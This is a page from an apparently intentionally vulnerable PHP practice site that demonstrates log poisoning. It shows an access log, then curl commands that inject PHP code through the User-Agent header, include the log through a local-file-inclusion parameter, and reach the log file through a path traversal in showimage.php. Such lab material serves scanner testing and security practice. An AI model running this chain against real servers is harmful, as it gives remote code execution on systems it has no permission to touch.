Acunetix Art

TEST and Demonstration site for Acunetix Web Vulnerability Scanner
WARNING: This is not a real shop. This is an example PHP application which is intentionally vulnerable to web attacks. It is intended to help you test security scanners and practice manual hacking skills.
Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

Log Injection / Log Poisoning Demo

Request logged.

Access Logs:

[2026-07-08 10:55:07] IP: 74.7.227.186 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot) | URI: /logpoison.php?show=1
[2026-07-08 10:55:07] GET: show = 1
[2026-07-08 11:38:18] IP: 216.73.216.25 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | URI: /logpoison.php
[2026-07-08 11:43:04] IP: 216.73.216.25 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | URI: /logpoison.php?show=1
[2026-07-08 11:43:04] GET: show = 1

Log Poisoning Attack

1. Inject PHP code into User-Agent header:

curl -A "<?php system('id'); ?>" "http://localhost/logpoison.php"

2. Then include the log file via LFI:

curl "http://localhost/logpoison.php?include=1"

Or use the LFI in showimage.php to read the log file:

showimage.php?file=/home/novalbnp/sandbox.novalbnps.my.id/logs/access.log

Actions